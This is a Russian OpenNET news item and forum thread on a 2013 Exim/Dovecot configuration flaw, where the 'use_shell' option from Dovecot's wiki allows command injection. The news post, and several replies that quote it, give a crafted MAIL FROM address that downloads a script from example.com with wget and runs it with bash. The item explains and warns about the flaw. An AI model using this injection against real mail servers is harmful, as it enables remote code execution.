The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка  RSS
"Опасная уязвимость при необдуманном использовании связки Exi..."
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Опасная уязвимость при необдуманном использовании связки Exi..."  +/
Сообщение от opennews (??) on 05-Май-13, 00:43 
В рекомендованном (http://wiki.dovecot.org/LDA/Exim?action=recall&rev=16) на wiki-сайте проекта и в некоторых других руководствах примере настройки связки почтового сервера Exim с IMAP/POP3-сервером Dovecot выявлена критическая уязвимость (https://www.redteam-pentesting.de/de/advisories/rt-sa-2013-0...), позволяющая выполнить произвольный код на сервере. Уязвимость может быть эксплуатирована через отправку письма со специальным образом оформленным адресом отправителя. Проблема проявляется только в системах, в которых в конфигурации Exim указана опция "use_shell" в блоке подключения Dovecot.


Изначально статья с ошибочной опцией была опубликована в 2009 году на официальном сайте проекта Dovecot и ошибка успела перекочевать во многие другие руководства. Всем пользователям связки Exim и Dovecot рекомендуется проверить настройки на предмет отсутствия опции "use_shell", при включении которой агент доставки запускается с использованием shell и передачей параметров в командной строке. Метод эксплуатации достаточно прост и сводится к манипуляции с экранированием спецсимволов, позволяя в итоге добиться выполнения shell-команд.

Например, атакующий может указать:


<font color="#461b7e">
MAIL FROM: red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${IFS}/tmp/p`team@example.com
</font>

В процессе обработки такого запроса exim выполнит


<font color="#461b7e">
/bin/sh -c "/usr/lib/Dovecot/deliver -e -k -s -f             \"red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${IFS}/tmp/p`team@example.com"
</font>


что приведёт к запуску wget, загрузке внешнего скрипта c сайта example.com/test.sh и его запуску.

URL: https://www.redteam-pentesting.de/de/advisories/rt-sa-2013-0...
Новость: http://www.opennet.dev/opennews/art.shtml?num=36859

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


3. "Опасная уязвимость при необдуманном использовании связки Exi..."  +13 +/
Сообщение от pavlinux (ok) on 05-Май-13, 01:28 
Ай красава! +100500
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

5. "Опасная уязвимость при необдуманном использовании связки Exi..."  –2 +/
Сообщение от AnonuS on 05-Май-13, 01:36 
> Ай красава! +100500

Павлик, а ты чего так сильно обрадовался ?

Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

10. "Опасная уязвимость при необдуманном использовании связки Exi..."  +16 +/
Сообщение от pavlinux (ok) on 05-Май-13, 03:14 
Ну дык:

> MAIL FROM: red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${IFS}/tmp/p`team@example.com

А то всё, NULL-pointers, SQL-inject, array-bounds, race-conditions, double-free, скукотища...  :D

Ответить | Правка | ^ к родителю #5 | Наверх | Cообщить модератору

66. "Опасная уязвимость при необдуманном использовании связки Exi..."  +/
Сообщение от AnonuS on 08-Май-13, 00:28 
> Ну дык:
>> MAIL FROM: red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${IFS}/tmp/p`team@example.com
> А то всё, NULL-pointers, SQL-inject, array-bounds, race-conditions, double-free, скукотища...
>  :D

Да, ты прав, это действительно новое слово в науке и технике, свежая струя так сказать...

:-)))

Ответить | Правка | ^ к родителю #10 | Наверх | Cообщить модератору

6. "Опасная уязвимость при необдуманном использовании связки Exi..."  –1 +/
Сообщение от Аноним (??) on 05-Май-13, 01:44 
ohh shit

    address_pipe:
        driver = pipe
        ignore_status
        return_output
        use_shell

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

8. "Опасная уязвимость при необдуманном использовании связки Exi..."  +2 +/
Сообщение от Аноним (??) on 05-Май-13, 02:33 
что вы в фичах понимаете :) это же так удобно! и никаких RMS не нужно :)
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

9. "Опасная уязвимость при необдуманном использовании связки Exi..."  +/
Сообщение от Sylvia (ok) on 05-Май-13, 03:03 
таки проблема на стороне Exim, эхх, опять г-н Сирайнен денег не даст за дырку (:
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

13. "Опасная уязвимость при необдуманном использовании связки Exi..."  +2 +/
Сообщение от Аноним (??) on 05-Май-13, 08:33 
Конечно, не даст. Дырка-то не его.
Ответить | Правка | ^ к родителю #9 | Наверх | Cообщить модератору

11. "Опасная уязвимость при необдуманном использовании связки Exi..."  +5 +/
Сообщение от koblin (ok) on 05-Май-13, 03:35 
распространение "уязвимости" через вики с документацией! а что, хорошая идея
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

15. "Опасная уязвимость при необдуманном использовании связки Exi..."  +2 +/
Сообщение от Аноним (??) on 05-Май-13, 09:17 
unixway для вирусов
Ответить | Правка | ^ к родителю #11 | Наверх | Cообщить модератору

36. "Опасная уязвимость при необдуманном использовании связки Exi..."  +1 +/
Сообщение от all_glory_to_the_hypnotoad (ok) on 05-Май-13, 12:55 
exim с его вики это не юникс вей
Ответить | Правка | ^ к родителю #15 | Наверх | Cообщить модератору

12. "Опасная уязвимость при необдуманном использовании связки Exi..."  –1 +/
Сообщение от Аноним (??) on 05-Май-13, 08:31 
Начинающий почтовик задает вопрос гуру. Зачем Exim нужен Dovecot-у.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

14. "Опасная уязвимость при необдуманном использовании связки Exi..."  +/
Сообщение от Аноним (??) on 05-Май-13, 08:47 
Не-а. Zimbra возьму лучше.
Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

23. "Опасная уязвимость при необдуманном использовании связки Exi..."  –1 +/
Сообщение от robux (ok) on 05-Май-13, 10:42 
Обратный вопрос: зачем exim'у нужен dovecot?
Экзим и не зная ничего об довекоте прекрасно работает.
Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

25. "Опасная уязвимость при необдуманном использовании связки Exi..."  +1 +/
Сообщение от DeadLoco (ok) on 05-Май-13, 10:43 
> Обратный вопрос: зачем exim'у нужен dovecot?
> Экзим и не зная ничего об довекоте прекрасно работает.

Да неужто? И РОР/IMAP тоже? Надо же, как я от жизни отстал...

Ответить | Правка | ^ к родителю #23 | Наверх | Cообщить модератору

29. "Опасная уязвимость при необдуманном использовании связки Exi..."  +1 +/
Сообщение от pavlinux (ok) on 05-Май-13, 12:20 
>> Обратный вопрос: зачем exim'у нужен dovecot?
>> Экзим и не зная ничего об довекоте прекрасно работает.
> Да неужто? И РОР/IMAP тоже? Надо же, как я от жизни отстал...

Представь себе! Exim - это SMTP


Ответить | Правка | ^ к родителю #25 | Наверх | Cообщить модератору

34. "Опасная уязвимость при необдуманном использовании связки Exi..."  +/
Сообщение от DeadLoco (ok) on 05-Май-13, 12:45 
>>> Экзим и не зная ничего об довекоте прекрасно работает.
>> Да неужто? И РОР/IMAP тоже? Надо же, как я от жизни отстал...
> Представь себе! Exim - это SMTP

Экзим - это программа!

Ответить | Правка | ^ к родителю #29 | Наверх | Cообщить модератору

41. "Опасная уязвимость при необдуманном использовании связки Exi..."  +1 +/
Сообщение от rshadow (ok) on 05-Май-13, 14:33 
Отмаз не защитан.
Ответить | Правка | ^ к родителю #34 | Наверх | Cообщить модератору

44. "Опасная уязвимость при необдуманном использовании связки Exi..."  +3 +/
Сообщение от pavlinux (ok) on 05-Май-13, 15:02 
> Экзим - это программа!

Программа - это "Здоровье" с Еленой Малышевой, а Exim - это MTA (Mail ТруЪ Agent)!

Ответить | Правка | ^ к родителю #34 | Наверх | Cообщить модератору

55. "Опасная уязвимость при необдуманном использовании связки Exi..."  +/
Сообщение от DeadLoco (ok) on 05-Май-13, 23:06 
> Exim - это SMTP
> Exim - это MTA

Прям, не программа, а какой-то Людовик Четырнадцатый в бинарном представлении...

Ответить | Правка | ^ к родителю #44 | Наверх | Cообщить модератору

60. "Опасная уязвимость при необдуманном использовании связки Exi..."  +2 +/
Сообщение от pavlinux (ok) on 06-Май-13, 16:27 
BMW Z4 - машина.
BMW Z4 в пос. Кукуево - понты граничащие с маразмом.

Ответить | Правка | ^ к родителю #55 | Наверх | Cообщить модератору

62. "Опасная уязвимость при необдуманном использовании связки Exi..."  +1 +/
Сообщение от DeadLoco (ok) on 06-Май-13, 18:57 
> BMW Z4 - машина.
> BMW Z4 в пос. Кукуево - понты граничащие с маразмом.

BMW Z4 в придорожном столбе (вследствие неумения обращаться с) - источник лулзов :)
Впрочем, как и экзим с довекотом, да и почти любой другой софт.

Ответить | Правка | ^ к родителю #60 | Наверх | Cообщить модератору

48. "Опасная уязвимость при необдуманном использовании связки Exi..."  –2 +/
Сообщение от robux (ok) on 05-Май-13, 17:18 
> Да неужто? И РОР/IMAP тоже? Надо же, как я от жизни отстал...

Ваша логика: "Сталин воевал с Гитлером, поэтому они братья".

Exim и Dovecot пересекаются только на общих базах [сообщений и юзеров].
На общих базах, понимаешь? При этом на уровне API они не обязаны быть связаны.

То, что кто-то костыляет одно через другое, тем более привязывает MTA к POP-серверу (а не наоборот), то он сам себе злой буратинко. О чем в новости и написано.

Ответить | Правка | ^ к родителю #25 | Наверх | Cообщить модератору

49. "Опасная уязвимость при необдуманном использовании связки Exi..."  +/
Сообщение от quux email(??) on 05-Май-13, 18:57 
MTA вызывает MDA для локальной доставки, где вы API и привязки какие-то увидели ?
Ответить | Правка | ^ к родителю #48 | Наверх | Cообщить модератору

56. "Опасная уязвимость при необдуманном использовании связки Exi..."  +1 +/
Сообщение от DeadLoco (ok) on 05-Май-13, 23:15 
> MTA вызывает MDA для локальной доставки, где вы API и привязки какие-то увидели ?

Ну, очень удобно из экзима обращаться к довекотовскому аутентификатору, например, для TLS. И вообще, если рядом с экзимом живет довекот, то LDA, фильтрацию, квоты и аутентификацию гораздо удобнее и функциональнее спихнуть именно на довекот.

Ответить | Правка | ^ к родителю #49 | Наверх | Cообщить модератору

64. "Опасная уязвимость при необдуманном использовании связки Exi..."  +/
Сообщение от Аноним (??) on 06-Май-13, 20:31 
а вот спорим, что вы сами никогда реальный почтовый сервер не поднимали...
Ответить | Правка | ^ к родителю #48 | Наверх | Cообщить модератору

51. "Опасная уязвимость при необдуманном использовании связки Exi..."  +/
Сообщение от angra (ok) on 05-Май-13, 20:03 
Работает конечно, но вот только единый механизм аутентификации и укладки писем в maildir лучше чем два независимых. Ну а там где почтовик просто посылает всю почту на другой хост обычно nullmailer хватает.

Ответить | Правка | ^ к родителю #23 | Наверх | Cообщить модератору

57. "Опасная уязвимость при необдуманном использовании связки Exi..."  +1 +/
Сообщение от DeadLoco (ok) on 05-Май-13, 23:25 
> Работает конечно, но вот только единый механизм аутентификации
> и укладки писем в maildir лучше чем два независимых.

Укладки _И_ извлечения!

У всех, кто не пользуется довекотовским ЛДА из МТА, наверчены жуткие извраты в пермишнах мейлдиров.

Ответить | Правка | ^ к родителю #51 | Наверх | Cообщить модератору

27. "Опасная уязвимость при необдуманном использовании связки Exi..."  +1 +/
Сообщение от анон on 05-Май-13, 12:14 
Dovecot не MTA, а exim MTA.

Ваш К.О.

Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

50. "Опасная уязвимость при необдуманном использовании связки Exi..."  +/
Сообщение от kombat (ok) on 05-Май-13, 19:48 
это когда фетчмейл получив с внешнего ящика письмо, отправляет екзиму, например, на локалхост:25, а тот кладет в мейлдир, который довекотом отдается локальному юзеру через поп или имап.
Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

16. "Опасная уязвимость при необдуманном использовании связки Exi..."  +3 +/
Сообщение от YetAnotherOnanym (ok) on 05-Май-13, 09:29 
Вот поэтому надо самому курить документацию на софт (а также основополагающие документы типа RFC), а не настраивать, как обезьяна, по статьям на сторонних ресурсах.
Да, это долго и муторно, но по-другому никак.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

20. "Опасная уязвимость при необдуманном использовании связки Exi..."  –1 +/
Сообщение от Int on 05-Май-13, 09:49 
>Вот поэтому надо самому курить документацию на софт (а также основополагающие документы типа RFC), а не настраивать, как обезьяна, по статьям на сторонних ресурсах.

"Изначально статья с ошибочной опцией была опубликована в 2009 году на официальном сайте проекта Dovecot"

официальный сайт это сторонний ресурс ? делаааа

Ответить | Правка | ^ к родителю #16 | Наверх | Cообщить модератору

37. "Опасная уязвимость при необдуманном использовании связки Exi..."  +2 +/
Сообщение от анон on 05-Май-13, 12:57 
Я видел эту статью, но мне хватило мозгов, не тупо скопировать, а розобраться что означает _каждый_ параметр в примере. И я убрал use_shell, поскольку он мне не нужен был - он вообще мало кому нужен.
Ответить | Правка | ^ к родителю #20 | Наверх | Cообщить модератору

38. "Опасная уязвимость при необдуманном использовании связки Exi..."  +2 +/
Сообщение от анон on 05-Май-13, 13:02 
Вообще надо быть крайне одаренным эникеем, чтоб скопировать и не обратить внимание на этот параметр, который в названии просто кричит о своей подлой сущности.


Ответить | Правка | ^ к родителю #37 | Наверх | Cообщить модератору

46. "Опасная уязвимость при необдуманном использовании связки..."  +/
Сообщение от arisu (ok) on 05-Май-13, 15:21 
на официальных сайтах надо давать примеры с патчем Бармина, и только такие. чтобы дебилы отсеивались ещё на подлёте.
Ответить | Правка | ^ к родителю #20 | Наверх | Cообщить модератору

47. "Опасная уязвимость при необдуманном использовании связки..."  +/
Сообщение от анон on 05-Май-13, 17:14 
Да это и есть бармин в чистом виде, только сильно отложенный. Но, думаю, те кто умеют читать между строк, с этого руководства свой профит поимели.
Ответить | Правка | ^ к родителю #46 | Наверх | Cообщить модератору

22. "Опасная уязвимость при необдуманном использовании связки Exi..."  +/
Сообщение от DeadLoco (ok) on 05-Май-13, 10:35 
Это еще что! Мне как-то доводилось переделывать почтовик, настроенный по статье "у Лисяры". Так в статье с шутками и прибаутками рекомендовалось почтовику давать рутовый доступ к БД и ФС.
Ответить | Правка | ^ к родителю #16 | Наверх | Cообщить модератору

30. "Опасная уязвимость при необдуманном использовании связки Exi..."  +/
Сообщение от pavlinux (ok) on 05-Май-13, 12:23 
>  рекомендовалось почтовику давать рутовый доступ к БД и ФС.

Если чо, рут у базы данных != root в /etc/passwd

Ответить | Правка | ^ к родителю #22 | Наверх | Cообщить модератору

33. "Опасная уязвимость при необдуманном использовании связки Exi..."  +1 +/
Сообщение от DeadLoco (ok) on 05-Май-13, 12:44 
>>  рекомендовалось почтовику давать рутовый доступ к БД и ФС.
> Если чо, рут у базы данных != root в /etc/passwd

Если чо, то в рутовом доступе к БД веселого очень немного.

Ответить | Правка | ^ к родителю #30 | Наверх | Cообщить модератору

39. "Опасная уязвимость при необдуманном использовании связки Exi..."  +3 +/
Сообщение от Аноним (??) on 05-Май-13, 14:10 
> Если чо, то в рутовом доступе к БД веселого очень немного.

Таких б@лванов, тем не менее, просто мечут, как икру.

Лисяра, в этом отношении, просто редкостно од@ренный тип: "Я не стал разбираться, почему не работает, просто дал chmod 777 *".

О принципе наименьшей привилегии вообще мало кто слышал из кр@сноглазых "самоучек". Гении среди гогна и удобрений.

Ответить | Правка | ^ к родителю #33 | Наверх | Cообщить модератору

42. "Опасная уязвимость при необдуманном использовании связки Exi..."  +1 +/
Сообщение от rshadow (ok) on 05-Май-13, 14:36 
Обыкновенные пользователи. Они навсех системах одинаковы.
Ответить | Правка | ^ к родителю #39 | Наверх | Cообщить модератору

43. "Опасная уязвимость при необдуманном использовании связки Exi..."  +1 +/
Сообщение от rshadow (ok) on 05-Май-13, 14:38 
> О принципе наименьшей привилегии...

Зато принципом наименьшего сопротивления пользуются все

Ответить | Правка | ^ к родителю #39 | Наверх | Cообщить модератору

45. "Опасная уязвимость при необдуманном использовании связки Exi..."  –1 +/
Сообщение от pavlinux (ok) on 05-Май-13, 15:07 
>>>  рекомендовалось почтовику давать рутовый доступ к БД и ФС.
>> Если чо, рут у базы данных != root в /etc/passwd
> Если чо, то в рутовом доступе к БД веселого очень немного.

Да нет там рута! Там есть привилегии и контекст.  

Кстати, для полного счастья, и проверки феншуйности вашего UNIX,
нужно создать другого юзера с UID==0, удалить рута, и проверить
работоспособность всей системы.

Ответить | Правка | ^ к родителю #33 | Наверх | Cообщить модератору

53. "Опасная уязвимость при необдуманном использовании связки Exi..."  –1 +/
Сообщение от DeadLoco (ok) on 05-Май-13, 22:58 
> Кстати, для полного счастья, и проверки феншуйности вашего UNIX,
> нужно создать другого юзера с UID==0, удалить рута, и проверить
> работоспособность всей системы.

Так оно у меня так штатно делается уже хрен знает сколько лет.

Ответить | Правка | ^ к родителю #45 | Наверх | Cообщить модератору

54. "Опасная уязвимость при необдуманном использовании связки Exi..."  +/
Сообщение от DeadLoco (ok) on 05-Май-13, 23:03 
> Да нет там рута! Там есть привилегии и контекст.

При установке мускля автоматом создается юзер БД root с пустым паролем и полными привилегиями, включая грант, на таблицу mysql. Так что, я б поостерегся делать скоропалительные заявления.

Ответить | Правка | ^ к родителю #45 | Наверх | Cообщить модератору

61. "Опасная уязвимость при необдуманном использовании связки Exi..."  –1 +/
Сообщение от pavlinux (ok) on 06-Май-13, 16:29 
>> Да нет там рута! Там есть привилегии и контекст.
> При установке мускля автоматом создается юзер БД root с пустым паролем и
> полными привилегиями, включая грант, на таблицу mysql. Так что, я б
> поостерегся делать скоропалительные заявления.

ПИН-код на кредитке фломастером не пишешь? :)

Ответить | Правка | ^ к родителю #54 | Наверх | Cообщить модератору

63. "Опасная уязвимость при необдуманном использовании связки Exi..."  +/
Сообщение от DeadLoco (ok) on 06-Май-13, 19:13 
> ПИН-код на кредитке фломастером не пишешь? :)

Неа :)

Я всего лишь пытаюсь донести до общественности простую мысль, что на большинстве хостов, настроенных конфиг-киддизами по популярным гогно-руководствам, можно обнаружить массу презабавнейшего - от тупо дефолтного до адвансед-кривого бай дезигн "по рекомендациям от лучших собаководов".

Ответить | Правка | ^ к родителю #61 | Наверх | Cообщить модератору

17. "Опасная уязвимость при необдуманном использовании связки Exi..."  +/
Сообщение от Дед Анон on 05-Май-13, 09:37 
Ахренеть! Вот это скорость! Вот это официальный ман на Wiki!
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

18. "Опасная уязвимость при необдуманном использовании связки Exi..."  +/
Сообщение от Drontozaurus on 05-Май-13, 09:45 
Есть замечательный проект - Exim4U (exim4u.org), облегчающий процесс приручения к виртуальным доменам. MySQL, SPF, DKIM и т.д. Единственный его косяк - хранение паролей в чистом виде по-умолчанию, что замечательно переделывается на хэши, поддерживаемые как exim так и dovecot.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

19. "Опасная уязвимость при необдуманном использовании связки Exi..."  +1 +/
Сообщение от Int on 05-Май-13, 09:48 
>Изначально статья с ошибочной опцией была опубликована в 2009 году на официальном сайте проекта Dovecot и ошибка успела перекочевать во многие другие руководства.

Смешно. Охренено смешно. :(

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

21. "Опасная уязвимость при необдуманном использовании связки Exi..."  +3 +/
Сообщение от Прохожий (??) on 05-Май-13, 10:07 
Думать своей головой надо.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

24. "Опасная уязвимость при необдуманном использовании связки Exi..."  +1 +/
Сообщение от DeadLoco (ok) on 05-Май-13, 10:42 
> Думать своей головой надо.

И доки читать

EXIM 29:5
If this option is set, it causes the command to be passed to /bin/sh instead of being run directly from the transport, as described in section 29.3. This is less secure, but is needed in some situations where the command is expected to be run under a shell and cannot easily be modified

Ответить | Правка | ^ к родителю #21 | Наверх | Cообщить модератору

26. "Опасная уязвимость при необдуманном использовании связки Exi..."  –1 +/
Сообщение от vitalif email on 05-Май-13, 11:40 
У меня с EXIM'ом знакомство пока как-то по такому алгоритму: поставил, посмотрел, решил какой-то он косой, снёс, поставил postfix.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

28. "Опасная уязвимость при необдуманном использовании связки Exi..."  +5 +/
Сообщение от quux email(??) on 05-Май-13, 12:19 
Увы это больше говорит о вас нежели об exim'e.
Ответить | Правка | ^ к родителю #26 | Наверх | Cообщить модератору

31. "Опасная уязвимость при необдуманном использовании связки Exi..."  +/
Сообщение от Аноним (??) on 05-Май-13, 12:30 
Morris Worm strikes back!
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

32. "Опасная уязвимость при необдуманном использовании связки Exi..."  +/
Сообщение от Аноним email(??) on 05-Май-13, 12:37 
прыщеглазики опять прощляпили
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

40. "Опасная уязвимость при необдуманном использовании связки Exi..."  +/
Сообщение от Аноним (??) on 05-Май-13, 14:14 
> прыщеглазики опять прощляпили

Прыщебл@дам просто западло академическое образование получать. Поколение вики, блжад. Принцип наименьшей привилегии в универнситетах вколачивают в тупые головы студоты!

Ответить | Правка | ^ к родителю #32 | Наверх | Cообщить модератору

52. "Опасная уязвимость при необдуманном использовании связки Exi..."  +1 +/
Сообщение от angra (ok) on 05-Май-13, 20:10 
Увы, но уровень знаний преподов в области IT в наших универах зачастую ниже чем у эникейщиков. Во многих местах до сих программирование по трупопаскакалю изучают, а ОСи по менюшкам ворда.


Ответить | Правка | ^ к родителю #40 | Наверх | Cообщить модератору

35. "Опасная уязвимость при необдуманном использовании связки Exi..."  +3 +/
Сообщение от Михрютка (ok) on 05-Май-13, 12:54 
как дети чесслово. шеллы какие-то, эскейпирование.

учитесь, как настоящие энтерпрайзные дырки в почте делать-то надо

http://www-01.ibm.com/support/docview.wss?uid=swg21633819

"The IBM Notes mail client accepts Java applet tags and JavaScript tags inside HTML emails, making it possible to load Java applets and scripts from a remote location."

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

65. "Опасная уязвимость при необдуманном использовании связки Exi..."  +/
Сообщение от Andrey Mitrofanov on 06-Май-13, 23:20 
> как дети чесслово. шеллы какие-то, эскейпирование.
> учитесь, как настоящие энтерпрайзные дырки в почте делать-то надо

Нет, Только bash! Ленин завещал учиться, но до до джаввы же.

> "The IBM Notes mail client accepts Java applet tags and JavaScript tags

Ответить | Правка | ^ к родителю #35 | Наверх | Cообщить модератору

58. "Опасная уязвимость при использовании рекомендуемых в докумен..."  +/
Сообщение от Аноним (??) on 06-Май-13, 03:02 
Учитесь как надо:

local_delivery:
  driver = lmtp
  user = mail
  socket = /run/dovecot/lmtp

Скока лет ни одной новой дырки.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

59. "Опасная уязвимость при использовании рекомендуемых в докумен..."  +/
Сообщение от Аноним (??) on 06-Май-13, 13:13 
а как же noexec в /tmp ?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

67. "Опасная уязвимость при использовании рекомендуемых в докумен..."  +/
Сообщение от Аноним (??) on 08-Май-13, 12:45 
Редко применяется, так как во многихдистрибутивах во время апгрейда пакетов запускаются постинстал скрипты из /tmp
Ответить | Правка | ^ к родителю #59 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру